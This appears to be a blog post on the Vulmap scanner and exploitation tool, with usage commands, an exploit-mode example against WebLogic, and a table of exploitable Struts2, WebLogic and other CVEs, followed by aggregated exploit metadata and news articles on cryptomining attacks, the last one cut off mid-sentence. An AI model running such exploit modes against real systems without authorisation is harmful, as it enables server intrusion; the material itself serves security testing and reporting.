[](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)
Vulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists.
Vulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use "-m" to select which mode to use, and the default poc mode is the default. In poc mode, it also supports "-f" batch target scanning, "-o" File output results and other main functions, Other functions [Options](<https://github.com/zhzyker/vulmap/#options>) Or python3 vulmap.py -h, the Poc function will no longer be provided in the exploit exploit mode, but the exploit will be carried out directly, and the exploit result will be fed back to further verify whether the vulnerability exists and whether it can be exploited.
**Try to use "-a" to establish target types to reduce false positives, such as "-a solr"**
### Installation
The operating system must have python3, python3.7 or higher is recommended
* Installation dependency
pip3 install -r requirements.txt
* Linux & MacOS & Windows
python3 vulmap.py -u http://example.com
### Options
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Target URL (e.g. -u "http://example.com")
-f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f "/home/user/list.txt")
-m MODE, --mode MODE The mode supports "poc" and "exp", you can omit this option, and enter poc mode by default
-a APP, --app APP Specify a web app or cms (e.g. -a "weblogic"). default scan all
-c CMD, --cmd CMD Custom RCE vuln command, Other than "netstat -an" and "id" can affect program judgment. defautl is "netstat -an"
-v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v "CVE-2020-2729")
--list Displays a list of vulnerabilities that support scanning
--debug Debug mode echo request and responses
--delay DELAY Delay check time, default 0s
--timeout TIMEOUT Scan timeout time, default 10s
--output FILE Text mode export (e.g. -o "result.txt")
### Examples
Test all vulnerabilities poc mode
python3 vulmap.py -u http://example.com
For RCE vuln, use the "id" command to test the vuln, because some linux does not have the "netstat -an" command
python3 vulmap.py -u http://example.com -c "id"
Check <http://example.com> for struts2 vuln
python3 vulmap.py -u http://example.com -a struts2
python3 vulmap.py -u http://example.com -m poc -a struts2
Exploit the CVE-2019-2729 vuln of WebLogic on <http://example.com:7001>
python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729
python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729
Batch scan URLs in list.txt
python3 vulmap.py -f list.txt
Export scan results to result.txt
python3 vulmap.py -u http://example.com:7001 -o result.txt
### Vulnerabilitys List
Vulmap supported vulnerabilities are as follows
+-------------------+------------------+-----+-----+-------------------------------------------------------------+
| Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |
+-------------------+------------------+-----+-----+-------------------------------------------------------------+
| Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |
| Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |
| Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |
| Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |
| Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |
| Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |
| Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |
| Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |
| Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |
| Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |
| Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |
| Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |
| Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |
| Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |
| Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |
| Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |
| Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |
| Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |
| Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |
| Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |
| Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |
| Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |
| Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |
| Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |
| Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |
| Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |
| Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |
| Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |
| Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |
| Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |
| Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |
| Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |
| Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |
| Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |
| Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |
| Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |
| Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |
| Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |
| Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |
| RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |
| RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |
| RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |
| ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |
| ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |
+-------------------+------------------+-----+-----+-------------------------------------------------------------+
### Docker
docker build -t vulmap/vulmap .
docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com
**[Download Vulmap](<https://github.com/zhzyker/vulmap> "Download Vulmap" )**
{"githubexploit": [{"lastseen": "2021-12-29T23:35:43", "description": "# CVE-2019-2725\nWebLogic Universal Exploit - CVE-2017-3506 / CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-08-23T01:42:57", "type": "githubexploit", "title": "Exploit for Injection in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2017-10271", "CVE-2017-3506"], "modified": "2021-12-29T12:52:27", "id": "7BA07704-21CC-5BFC-A0F9-8FDA2BC84402", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-30T18:09:06", "description": "# weblogicPoc\nWeblogic Vuln POC EXP cve-2020-2551 cve-2020-2555...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-16T03:01:32", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2551", "CVE-2020-2555", "CVE-2020-2883"], "modified": "2022-03-30T14:19:43", "id": "94095106-8E25-54E1-924C-2C3B4E99610F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:32:49", "description": "# drupal8-REST-RCE\nCVE-2019-6340 drupal8-REST-RCE (/node/1) , CV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-08-31T22:55:18", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Drupal", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-6340", "CVE-2018-7600"], "modified": "2020-11-24T15:41:16", "id": "0B0F940B-BBCE-52B1-8A3F-6FF63D7BDA4E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:04:22", "description": "<h1 align=\"center\" >Welcome to CodeTest</h1>\n\n### :point_right:\u5173...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-30T01:55:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2555", "CVE-2020-14882"], "modified": "2021-11-14T02:41:21", "id": "504A0052-A0EB-53EA-AFC3-4E5EEC236795", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T03:59:32", "description": "```\nweblogic CVE-2019-2725 CVE-2019...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-24T08:33:07", "type": "githubexploit", "title": "Exploit for Injection in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729"], "modified": "2022-03-23T01:26:21", "id": "4F4AF4AC-0953-5098-98D6-592B918B0836", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:10:36", "description": "# CVE-2020-10199\r\n\r\n\u56de\u663e\u7248\u672c \u968f\u624b\u5199\u7684\u672a\u6d4b\u8bd5bug...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-15T06:12:51", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Sonatype Nexus", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10199"], "modified": "2022-06-20T08:12:01", "id": "2C8634AE-CCCD-5AFC-94A7-D1742433840C", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}], "threatpost": [{"lastseen": "2019-07-03T05:58:59", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on Github2 and Twitter just days after the latest flaw was publicized. Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX also a competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a Powershell command on a targeted victim,\u201d researchers said. \u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "cvss3": {}, "published": "2018-09-05T17:48:03", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-13T21:58:43", "description": "The Panda threat group, best known for launching the widespread and successful 2018 [\u201cMassMiner\u201d cryptomining malware](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>) campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.\n\nWhile considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services. So far, researchers estimate that Panda has made away with more than $100,000 in Monero \u2013 and with attacks as recently as August 2019, the threat group isn\u2019t ceasing its activities anytime soon, they said.\n\n\u201cPanda\u2019s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information,\u201d said Christopher Evans and David Liebenberg with [Cisco\u2019s Talos research team.](<https://blog.talosintelligence.com/2019/09/panda-evolution.html>)\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers first became aware of Panda in the summer of 2018 after they engaged in a widespread illicit mining campaign called \u201c[MassMiner](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>).\u201d During that campaign, the threat actor used MassScan, a legitimate port scanner, to sniff out various vulnerabilities in servers to exploit, including a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>)).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/17155626/image4.png>)\n\nThe threat group then would exploit the flaws and install malware, which would set about mining for Monero and hooking up with a crypto-wallet and mining pool.\n\nSince then, in 2019, researchers said that the threat group has constantly evolved to update its infrastructure, exploits and payloads.\n\n\u201cShortly thereafter [the 2018 campaign], we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers,\u201d researchers said. \u201cWe believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems.\u201d\n\nPanda has constantly changed the vulnerabilities that it targets over the past year. For instance, in January 2019, Talos researchers saw Panda exploiting a recently-disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942). And in June 2019, Panda began to target a newer WebLogic vulnerability (CVE-2019-2725) and leveraging an updated payload with new features to download a secondary miner payload.\n\nIn the most recent campaigns, including one which took place in August 2019, Panda began employing a different set of command-and-control (C2) servers as well as a new payload-hosting infrastructure.\n\nIn March 2019, for instance, researchers observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. And in August, researchers said they observed several attacker IPs, post-exploit, pulling down payloads from a newer URL and saving the file as \u201cBBBBB\u201d (a slight departure from previous behavior, when the file was saved under a random 20-character name). Panda would then execute the file via PowerShell.\n\nPanda has changed up its payload over the summer as well, so that it\u2019s initial payload now uses the Certutil command-line utility \u2013 which can be used to obtain certificate authority information and configure Certificate Services \u2013 to download the secondary miner payload.\n\nThough the threat actor has swapped up its payloads, targeting and infrastructure, very little of its TTPs [tactics, techniques and procures] are sophisticated, Cisco\u2019s Evans told Threatpost.\n\nFor instance, \u201cThey attempt to hide their miners using the exact same popular techniques we see with other groups,\u201d he told Threatpost. \u201cTheir infrastructure is predictable: I can usually peg a new Panda domain as soon as I see it in the data; they tend to just be iterations of each other. Their early infrastructure was registered using an email address that immediately allowed Dave to pivot into their social media in China. They attack the same honeypots day after day with the same payloads. They don\u2019t even bother to confirm their victims are running a vulnerable system before they deliver an exploit.\u201d\n\nBetween swapping up its tactics, domains and payloads, researchers said that Panda has now made more than $100,000 through illicit cryptomining \u2013 and moving forward, Panda remains an active threat that system administers should be wary of.\n\n\u201cThere are several ways to detect mining activity but let\u2019s focus on the simple solutions of patching and basic security controls,\u201d Evans told Threatpost. \u201cIf you\u2019re running a web-accessible WebLogic server that has hasn\u2019t been patched against vulnerabilities like CVE-2017-10271, it\u2019s likely they have at least targeted the system for exploitation if not actually dropped a miner on it\u2026 In addition, if you don\u2019t need it open to the Internet, take it off.\u201d\n\n_**Interested in the role of artificial intelligence in cybersecurity, for both offense and defense? Don\u2019t miss our free **_[_**Threatpost webinar**_](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)_**, AI and Cybersecurity: Tools, Strategy and Advice, with senior editor Tara Seals and a panel of experts. **__**[Click here to register.](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)**_\n", "cvss3": {}, "published": "2019-09-17T21:04:35", "type": "threatpost", "title": "Panda Threat Group Mines for Monero With Updated Payload, Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T21:04:35", "id": "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "href": "https://threatpost.com/panda-threat-group-mines-for-monero-with-updated-payload-targets/148419/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:25:45", "description": "Oracle is urging customers to fast-track a patch for a critical flaw in its WebLogic Server under active attack. The company said it has received numerous reports that attackers were targeting the vulnerability [patched last month](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>).\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. The server has a remote code execution flaw, CVE-2020-2883, that can be exploited by unauthenticated attackers to take over unpatched systems.\n\nEric Maurice, director of security assurance, said [in a post last week](<https://blogs.oracle.com/security/apply-april-2020-cpu>) that the flaw was addressed in [Oracle\u2019s April 2020 Critical Patch Update](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>), which fixed 405 flaws, including 286 that were remotely exploitable across nearly two dozen product lines.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cOracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches,\u201d according to Oracle\u2019s security update. \u201cIn some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.\u201d\n\nShortly before Oracle\u2019s warning of the active exploits, proof of concept exploit code [was also published](<https://github.com/hktalent/CVE_2020_2546>) by a researcher (under the alias \u201chktalent\u201d) on GitHub for the flaw last week.\n\nAccording to Trend Micro\u2019s Zero Day Initiative, the flaw [ranks 9.8 out of 10](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2883>) on the CVSSv3 scale, making it critical severity. Two variants of the flaw were reported. The [first variant of the flaw](<https://www.zerodayinitiative.com/advisories/ZDI-20-504/>) exists within the handling of the T3 protocol, which is used to transport information between WebLogic 